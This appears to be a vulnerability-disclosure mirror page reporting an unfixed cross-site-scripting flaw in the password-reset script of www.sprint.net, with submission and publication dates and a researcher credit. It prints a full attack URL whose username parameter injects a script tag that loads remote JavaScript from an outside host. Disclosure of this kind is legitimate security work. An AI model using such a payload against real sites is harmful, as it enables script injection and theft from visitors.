Security researcher LostBrilliance, has submitted on 31/10/2009 a cross-site-scripting (XSS) vulnerability affecting www.sprint.net, which at the time of submission ranked 844569 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/02/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 31/10/2009 Date published: 12/02/2010 Fixed? Mail us!Status:  UNFIXED
Author: LostBrilliance Domain: www.sprint.net Category: XSS Pagerank: 844569
URL: https://www.sprint.net/resetpass.cgi?username=%22%3E%3Cscript%20src=http://bit.ly/4rzEF4%3E%3C/scrip
t%3E&email=teststr&answer=15&action=Reset+Compass+Password&login=&math=NSArIDEw%0D%0A [bit.y URL
may need to be re-created to point to http://ha.ckers.org/xss.js]
Click here to view the mirror
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.